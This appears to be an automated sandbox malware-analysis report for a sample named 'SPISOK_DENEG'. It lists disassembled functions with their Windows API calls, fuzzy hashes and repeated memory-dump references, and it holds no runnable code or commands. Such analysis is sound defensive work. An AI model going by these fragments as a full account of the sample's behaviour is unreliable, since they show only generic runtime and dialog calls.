                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            • String ID:
                                                            • API String ID: 3856339756-0
                                                            • Opcode ID: d49a5b933ed75116a44557c775b76bb97380a31f4378ecd53c0a93034da7b08f
                                                            • Instruction ID: a6e832d399b56ec2ca3c998e37bd3ada1c1e808fc06302833cb35f1dd526489e
                                                            • Opcode Fuzzy Hash: d49a5b933ed75116a44557c775b76bb97380a31f4378ecd53c0a93034da7b08f
                                                            • Instruction Fuzzy Hash: 41E06572504650EFC7019B59DC06B45FBADFB48B20F004265F416D3BA0CBB46840CA94
                                                            Function 000DA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000DA23A,?,000D755C,?,?,?,?), ref: 000DA254
                                                              • Part of subcall function 000DBB03: _wcslen.LIBCMT ref: 000DBB27
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,000DA23A,?,000D755C,?,?,?,?), ref: 000DA280
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: f764c21bc0f9054c703d9175a50a84fb138edee77b60b6dc06de8354ade27ffd
                                                            • Instruction ID: bdbe8cea0d2060b6735bf3455df69c379521e5f898d3e62b6cfeb89bfc7abe33
                                                            • Opcode Fuzzy Hash: f764c21bc0f9054c703d9175a50a84fb138edee77b60b6dc06de8354ade27ffd
                                                            • Instruction Fuzzy Hash: 37E0D8315002289BDB60AB78CC05BEA779CAB093E1F044262FD94E32D5D7B0DE84CAF0
                                                            Function 000EDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 000EDEEC
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 000EDF03
                                                              • Part of subcall function 000EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000EB579
                                                              • Part of subcall function 000EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000EB58A
                                                              • Part of subcall function 000EB568: IsDialogMessageW.USER32(00010480,?), ref: 000EB59E
                                                              • Part of subcall function 000EB568: TranslateMessage.USER32(?), ref: 000EB5AC
                                                              • Part of subcall function 000EB568: DispatchMessageW.USER32(?), ref: 000EB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            • String ID:
                                                            • API String ID: 2718869927-0
                                                            • Opcode ID: 373f591d1916a3900e586a82f533794ef1524fee1a89b9baf7ea642f99141542
                                                            • Instruction ID: 2133cb6bea9f9559cacbdb622f4641b32862007ffb31aeb9d9524204f4c06fa3
                                                            • Opcode Fuzzy Hash: 373f591d1916a3900e586a82f533794ef1524fee1a89b9baf7ea642f99141542
                                                            • Instruction Fuzzy Hash: D6E092B25003882ADF02AB61DC06FDE3B6C5B05785F444852B200EA5A3DA78EA508A71
                                                            Function 000E081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000E0836
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000DF2D8,Crypt32.dll,00000000,000DF35C,?,?,000DF33E,?,?,?), ref: 000E0858
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: 3caa794715084dd8d2c42775dbd11776e6bedc268a6c7f4185176cd0657407ad
                                                            • Instruction ID: 41112b74061cc1d3fa934b293d84e865233861d1f38a213ac2d61c52bba20378
                                                            • Opcode Fuzzy Hash: 3caa794715084dd8d2c42775dbd11776e6bedc268a6c7f4185176cd0657407ad
                                                            • Instruction Fuzzy Hash: 7EE048764011586BDB11A795DC05FDA77ACEF0D3D1F0400657645E2109DAB4DAC5CBB0
                                                            Function 000EA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 000EA3DA
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 000EA3E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            • Opcode ID: 2906dc879755b7f87dce1ddbea23821da04c70755cb312d28c36b31b4768a5af
                                                            • Instruction ID: d5f47e91d2f6737efd09a53f53fa8ac5d4efc893860a4529a4ddcfaec5c4930c
                                                            • Opcode Fuzzy Hash: 2906dc879755b7f87dce1ddbea23821da04c70755cb312d28c36b31b4768a5af
                                                            • Instruction Fuzzy Hash: 7DE0ED71901258EFCB50DF56C5416DEBBE8EB09360F20C05AA986A3241E7B4AF04DB91
                                                            Function 000F2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000F2BAA
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 000F2BB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1660781231-0
                                                            • Opcode ID: eec0f784155143f977f579d364c7a4a342fd3272c1bca5cb52edb00b41c6dc5c
                                                            • Instruction ID: 4371321528468d186da9c9644a3539719e7ea50703485e957ee72b91ff7e22ff
                                                            • Opcode Fuzzy Hash: eec0f784155143f977f579d364c7a4a342fd3272c1bca5cb52edb00b41c6dc5c
                                                            • Instruction Fuzzy Hash: EBD0A93515820C188CA83A7129064B83385AF81B71BA0068AFF2089CC2EB259080B512
                                                            Function 000D12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            • String ID:
                                                            • API String ID: 3351165006-0
                                                            • Opcode ID: 609f1757efb8ba0f6a550d91e6d707d3ec0214c1c95f519591bdfab9239a40d1
                                                            • Instruction ID: acb0fbe0f01ed7cc88cad014347d6e129c3c78ebdba7a00af37d0297a9374c39
                                                            • Opcode Fuzzy Hash: 609f1757efb8ba0f6a550d91e6d707d3ec0214c1c95f519591bdfab9239a40d1
                                                            • Instruction Fuzzy Hash: DEC0123205C200BECB010BB4DC09C2BBBA8ABA5322F04C908B4B5C0060C238C150EB11
                                                            Function 000D1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 518ad989e2756a95bc15e9b80ce06ee13491efdf88a37551b82931e9b2c5c118
                                                            • Instruction ID: 1f7d12f40a3f62c2332683ef582b59cb0fcc3acf2f9491e398eb4797b35124ac
                                                            • Opcode Fuzzy Hash: 518ad989e2756a95bc15e9b80ce06ee13491efdf88a37551b82931e9b2c5c118
                                                            • Instruction Fuzzy Hash: 05C17E70A00354ABEF55CF68C484BE97BE6AF15320F0801BBE8569B396DF709984CB71
                                                            Function 000D3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: ff0d7a75e2379283ae350c8ec603c4992b760bfa051e758e0b9513308d929d62
                                                            • Instruction ID: fa1e186785daf0751f4505a59b49d6fd09dc5b4870b3a731ebb68ab8de31d6b3
                                                            • Opcode Fuzzy Hash: ff0d7a75e2379283ae350c8ec603c4992b760bfa051e758e0b9513308d929d62
                                                            • Instruction Fuzzy Hash: 9B71B271500B849EDB35DB70C8559EBB7E9AF14301F44092FF2AB97382DA326684DF22
                                                            Function 000D8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D8289
                                                              • Part of subcall function 000D13DC: __EH_prolog.LIBCMT ref: 000D13E1
                                                              • Part of subcall function 000DA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000DA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            • String ID:
                                                            • API String ID: 2506663941-0
                                                            • Opcode ID: 5362a830cc6955a14ea017c76f27286769101c46974c2b07a9773196b767a08d
                                                            • Instruction ID: b4bf4ff2d020c674527ebc48942e4e4aa6a3217f71ca306a6a2b5c2804469e14
                                                            • Opcode Fuzzy Hash: 5362a830cc6955a14ea017c76f27286769101c46974c2b07a9773196b767a08d
                                                            • Instruction Fuzzy Hash: 2D4184719447589ADB24DB60CC55AEEB3A8AF04304F4444EBE18EA7293EB755FC5CB20
                                                            Function 000D13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D13E1
                                                              • Part of subcall function 000D5E37: __EH_prolog.LIBCMT ref: 000D5E3C
                                                              • Part of subcall function 000DCE40: __EH_prolog.LIBCMT ref: 000DCE45
                                                              • Part of subcall function 000DB505: __EH_prolog.LIBCMT ref: 000DB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 9f04288405c926c962073c27a1d42e6dda0bb741cce0add348e9d6be48f34999
                                                            • Instruction ID: a10907e71fcef96e7d35f639eadb003652d7c5a19f338b7ff984b1ca297a2f53
                                                            • Opcode Fuzzy Hash: 9f04288405c926c962073c27a1d42e6dda0bb741cce0add348e9d6be48f34999
                                                            • Instruction Fuzzy Hash: 784139B0905B41AEE724DF798885AE7FBE5BF19310F50492ED5FE83282CB716654CB10
                                                            Function 000D13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D13E1
                                                              • Part of subcall function 000D5E37: __EH_prolog.LIBCMT ref: 000D5E3C
                                                              • Part of subcall function 000DCE40: __EH_prolog.LIBCMT ref: 000DCE45
                                                              • Part of subcall function 000DB505: __EH_prolog.LIBCMT ref: 000DB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 8d829a8b47d20319b3959a9d941fabbae14d4b46c9b34843d05e054256cd2519
                                                            • Instruction ID: 03cd3082fcf331419545317763a7e1e73704a4c00de061a9b44ff7ae4386e59f
                                                            • Opcode Fuzzy Hash: 8d829a8b47d20319b3959a9d941fabbae14d4b46c9b34843d05e054256cd2519
                                                            • Instruction Fuzzy Hash: 954139B0905B809EE724DF798885AE7FBE5BF19310F50492ED5FE83282CB726654CB10
                                                            Function 000EB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000EB098
                                                              • Part of subcall function 000D13DC: __EH_prolog.LIBCMT ref: 000D13E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 1893989b71930089c21a0d8a25ce688ccd599808a31592c47ebb8f6d3676a62c
                                                            • Instruction ID: 265835c63f0eabeea1c7c42e4bf685cb1954c64da38c256fdd309fb65d9b59c8
                                                            • Opcode Fuzzy Hash: 1893989b71930089c21a0d8a25ce688ccd599808a31592c47ebb8f6d3676a62c
                                                            • Instruction Fuzzy Hash: 5F316B71C00289AECF15DF69D9519EFBBB4AF09310F5044AEE409B7242DB35AE04CB71
                                                            Function 000FAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 000FACF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 144ba71711b0110bff4e5f95009921131f0c0369d4d7f0638481819f24617f0e
                                                            • Instruction ID: 1eee1ff6a8881af88e8fd724a690255579386e30d883ed3de683915b33303d0d
                                                            • Opcode Fuzzy Hash: 144ba71711b0110bff4e5f95009921131f0c0369d4d7f0638481819f24617f0e
                                                            • Instruction Fuzzy Hash: 8111E7B370022D5FDB229E19EC409BA73D5AB8632071A4520FE5EABE54D630DC41A7D2
                                                            Function 000DCE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000DCE45
                                                              • Part of subcall function 000D5E37: __EH_prolog.LIBCMT ref: 000D5E3C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 0b78a0a40dca4b745452cbd42549eaaa620abae59e393365af90955c40e398f1
                                                            • Instruction ID: be15bd1e4e20d47cc8c294b3b30b10d5e386c28a488e93a13ab2c15f713b5f9b
                                                            • Opcode Fuzzy Hash: 0b78a0a40dca4b745452cbd42549eaaa620abae59e393365af90955c40e398f1
                                                            • Instruction Fuzzy Hash: F3114F71A003949EEB14EB79C545BEEB7E89F45300F10445EA446E3383DBB45A04D772
                                                            Function 000D9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: b01d7318f1ccc12f01ac6ffb86d459750f7327c8c8441c6cc442a1ccc231290c
                                                            • Instruction ID: a2b1634d20710dfb5bc3ed25bf82efe29ec061efd5aaaeb6fe979c78bd45a901
                                                            • Opcode Fuzzy Hash: b01d7318f1ccc12f01ac6ffb86d459750f7327c8c8441c6cc442a1ccc231290c
                                                            • Instruction Fuzzy Hash: FA016537900668BBCF12ABA8CD819EEB775AF88750F014517E916B7353DA348D05C6B0
                                                            Function 000FC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000FB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000F9813,00000001,00000364,?,000F3F73,00000050,?,00111030,00000200), ref: 000FB177
                                                            • _free.LIBCMT ref: 000FC4E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
